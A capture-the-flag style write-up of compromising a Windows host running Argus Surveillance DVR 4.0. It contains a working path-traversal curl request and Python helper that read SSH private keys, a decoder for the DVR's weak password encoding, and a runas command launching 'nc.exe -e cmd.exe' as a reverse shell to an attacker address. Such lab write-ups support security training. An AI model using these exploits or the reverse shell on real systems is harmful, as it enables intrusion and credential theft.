Key takeaways
- Local file inclusion (path traversal) vulnerability
- Weakly encrypted passwords
- Privilege escalation with Windows runas
Steps
Nmap scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 06:16 UTC
Nmap scan report for 192.168.53.179
Host is up (0.0011s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
| 3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_ 384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Connection: Keep-Alive
| Keep-Alive: timeout=15, max=4
| Content-Type: text/html
| Content-Length: 985
| <HTML>
| <HEAD>
| <TITLE>
| Argus Surveillance DVR
| </TITLE>
| <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
| <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
| <frameset frameborder="no" border="0" rows="75,*,88">
| <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0">
| <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">
| <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0">
| <noframes>
| <p>This page uses frames, but your browser doesn't support them.</p>
|_ </noframes>
|_http-title: Argus Surveillance DVR
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
For now port 8080 looks the most useful: it serves Argus Surveillance DVR, and browsing to it shows version 4.0.
Looking the product up turns up several published vulnerabilities.
We do not yet know which user accounts exist on the remote server, but these two are worth trying; Administrator at least is a valid account name.
After some trial and error, the following request reads the viewer user's SSH private key through the path traversal, and that key gives a working SSH login (port 22, Bitvise WinSSHD in the scan). The traversal is in the RESULTPAGE parameter: the 16 ../ segments walk up to the drive root, from where users/viewer/.ssh/id_rsa is read.
C:\home\kali\Documents\OFFSEC\GoToWork\DVR4> curl "http://192.168.218.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusers%2Fviewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
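The same request as a small Python helper, added here as an example for this writeup (it is not the published exploit): it builds the WEBACCOUNT.CGI URL with the traversal depth and target file as parameters, encodes it exactly as the curl command above does, and can fetch the file and check whether the body is an SSH private key. The host, the default depth of 16 and the two target paths are taken from this writeup; everything else is an assumption of the example.

```python
"""Path-traversal helper for the Argus Surveillance DVR 4.0 request used above.

Added example for this writeup, not the original exploit: it builds the same
WEBACCOUNT.CGI GET request as the curl command, with the traversal depth and
target file as parameters, and optionally fetches the file and checks whether
the body looks like an SSH private key.
"""
import sys
import urllib.request
from urllib.parse import urlencode

# The writeup reaches the drive root with 16 "../" segments; surplus ".." at
# the root are ignored by Windows, so overshooting is harmless.
DEFAULT_DEPTH = 16

# Files this writeup reads on the target (paths relative to C:\).
VIEWER_SSH_KEY = "users/viewer/.ssh/id_rsa"
DVR_PARAMS_INI = "ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini"


def build_traversal_url(host, target, depth=DEFAULT_DEPTH, port=8080):
    """Return the WEBACCOUNT.CGI URL that reads `target` via `depth` "../" hops.

    RESULTPAGE is appended to a path under the web root without normalisation,
    so "../" walks out of it. urlencode() uses quote_plus, which matches the
    curl command: "/" becomes %2F and the spaces in "  Ok  " become "+".
    """
    traversal = "../" * depth + target.lstrip("/")
    params = {
        "OkBtn": "  Ok  ",
        "RESULTPAGE": traversal,
        "USEREDIRECT": "1",
        "WEBACCOUNTID": "",
        "WEBACCOUNTPASSWORD": "",
    }
    return f"http://{host}:{port}/WEBACCOUNT.CGI?{urlencode(params)}"


def looks_like_private_key(body):
    """True if the response body is a PEM/OpenSSH private key rather than an
    error page, so a caller can stop at the first readable key file."""
    return b"-----BEGIN " in body and b"PRIVATE KEY-----" in body


def fetch_file(host, target, depth=DEFAULT_DEPTH, port=8080, timeout=10):
    """Send the traversal request and return the raw response body (bytes)."""
    url = build_traversal_url(host, target, depth=depth, port=port)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    # usage: python dvr_lfi.py <host> [target-path]
    host = sys.argv[1]
    target = sys.argv[2] if len(sys.argv) > 2 else VIEWER_SSH_KEY
    body = fetch_file(host, target)
    sys.stdout.write(body.decode("latin-1"))
    if looks_like_private_key(body):
        sys.stderr.write("[+] looks like a private key: chmod 600 it and try ssh -i\n")
```

Running it with the target host and no second argument reproduces the curl request for the viewer key; passing the DVRParams.ini path instead pulls the configuration file that the next step works from, without needing the SSH login first.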
Once logged in we also find DVRParams.ini, which stores the Administrator and Viewer passwords in encrypted form:
C:\ProgramData\PY_Software\Argus Surveillance DVR>dir
Volume in drive C has no label.
Volume Serial Number is 08DF-534D
Directory of C:\ProgramData\PY_Software\Argus Surveillance DVR
12/24/2024 11:02 PM <DIR> .
12/24/2024 11:02 PM <DIR> ..
12/24/2024 11:02 PM 38 Argus Surveillance DVR.DVRSes
12/25/2024 12:27 AM 5,822 DVRParams.ini
12/03/2021 12:26 AM <DIR> Gallery
12/03/2021 12:24 AM <DIR> Images
12/03/2021 12:26 AM <DIR> Logs
2 File(s) 5,860 bytes
5 Dir(s) 7,591,088,128 bytes free
The second exploit is used to crack that password, giving 14WatchD0g$. (The SyntaxWarning is from a backslash in the script's banner string and does not affect the result.)
C:\home\kali\Documents\OFFSEC\GoToWork\DVR4> python exp.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
/home/kali/Documents/OFFSEC/GoToWork/DVR4/exp.py:45: SyntaxWarning: invalid escape sequence '\_'
banner = '''
#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############
# #
# Updated by S3L33 #
#########################################
[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[+] D9A8:$
[+] Password: 14WatchD0g$
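What the exploit output above shows is the whole weakness: the "encryption" is a substitution of one 16-bit value per character, so anyone with a few known password/ciphertext pairs can rebuild the table. The following decoder is an added example for this writeup, not exp.py; its table holds only the eleven chunk-to-character pairs printed above, so it decodes this one password and flags anything else as unknown. It assumes the mapping does not depend on position, which is what the exploit's chunk-by-chunk output suggests but which the page itself does not prove; learn_codebook shows how that assumption lets a single known password recover table entries.

```python
"""Decoder for the Argus Surveillance DVR "encrypted" password format.

Added example for this writeup, not exp.py: the table below holds only the
eleven chunk -> character pairs the exploit printed above, so it decodes that
one password and reports any other chunk as unknown. It assumes, as the
exploit's output suggests, that the scheme is a fixed substitution of one
16-bit value per character with no dependence on position; that assumption is
what makes the table recoverable from known passwords.
"""

# Known pairs, taken verbatim from the exploit output above.
CODEBOOK = {
    "ECB4": "1", "53D1": "4", "6069": "W", "F641": "a", "E03B": "t",
    "D9BD": "c", "956B": "h", "FE36": "D", "BD8F": "0", "3CD9": "g",
    "D9A8": "$",
}

CHUNK = 4  # hex digits per plaintext character


def split_chunks(hexstr):
    """Split a hex string into 4-digit chunks; reject bad lengths early."""
    hexstr = hexstr.strip().upper()
    if len(hexstr) % CHUNK:
        raise ValueError(f"length {len(hexstr)} is not a multiple of {CHUNK}")
    return [hexstr[i:i + CHUNK] for i in range(0, len(hexstr), CHUNK)]


def decode(hexstr, codebook=CODEBOOK, placeholder="?"):
    """Return (plaintext, unknown_chunks). Unknown chunks become `placeholder`
    so the rest of the password is still readable."""
    out, unknown = [], []
    for chunk in split_chunks(hexstr):
        char = codebook.get(chunk)
        if char is None:
            unknown.append(chunk)
            char = placeholder
        out.append(char)
    return "".join(out), unknown


def encode(plaintext, codebook=CODEBOOK):
    """Inverse mapping; raises KeyError for a character the table lacks."""
    inverse = {char: chunk for chunk, char in codebook.items()}
    return "".join(inverse[c] for c in plaintext)


def learn_codebook(pairs):
    """Known-plaintext recovery: given (ciphertext_hex, plaintext) pairs, for
    example from setting a password of your choice in the DVR and reading it
    back out of DVRParams.ini, build the table. A chunk seen with two different
    characters would contradict the fixed-substitution assumption, so that is
    raised rather than silently overwritten."""
    table = {}
    for hexstr, plaintext in pairs:
        chunks = split_chunks(hexstr)
        if len(chunks) != len(plaintext):
            raise ValueError("ciphertext/plaintext length mismatch")
        for chunk, char in zip(chunks, plaintext):
            if table.get(chunk, char) != char:
                raise ValueError(f"chunk {chunk} maps to both {table[chunk]!r} and {char!r}")
            table[chunk] = char
    return table


if __name__ == "__main__":
    import sys
    for arg in sys.argv[1:]:
        text, unknown = decode(arg)
        note = f"  (unknown chunks: {', '.join(unknown)})" if unknown else ""
        print(f"{arg}: {text}{note}")
```

Unknown chunks are reported rather than guessed: when a second password from the same ini file contains characters outside this table, the placeholders show exactly which chunks still need a known-plaintext pair.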
With that password in hand, the Windows runas command can run c:\users\viewer\nc.exe as DVR4\Administrator to get a reverse shell as that user. For runas usage see "Runas command: lets a domain user / ordinary user run a specified program as administrator" by Colin.liu on 博客园 (cnblogs).
First start a listener locally with nc -nlvp 80, then run the following on the remote server. runas reads the password from the console, so this has to be done from an interactive session such as the SSH login above:
C:\Users\viewer>runas /env /profile /user:DVR4\Administrator "C:\users\viewer\nc.exe -e cmd.exe 192.168.45.157 80"
Enter the password for DVR4\Administrator:
Attempting to start C:\users\viewer\nc.exe -e cmd.exe 192.168.45.157 80 as user "DVR4\Administrator" ...
The local listener receives the reverse shell as Administrator, and whoami /all confirms the account's RID is 500 (the built-in Administrator): privilege escalation complete.
C:\home\kali\Documents\OFFSEC\GoToWork\DVR4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.218.179] 51225
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Users\viewer>whoami /a
whoami /a
ERROR: Invalid argument/option - '/a'.
Type "WHOAMI /?" for usage.
C:\Users\viewer>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
dvr4\administrator S-1-5-21-2619112490-2635448554-1147358759-500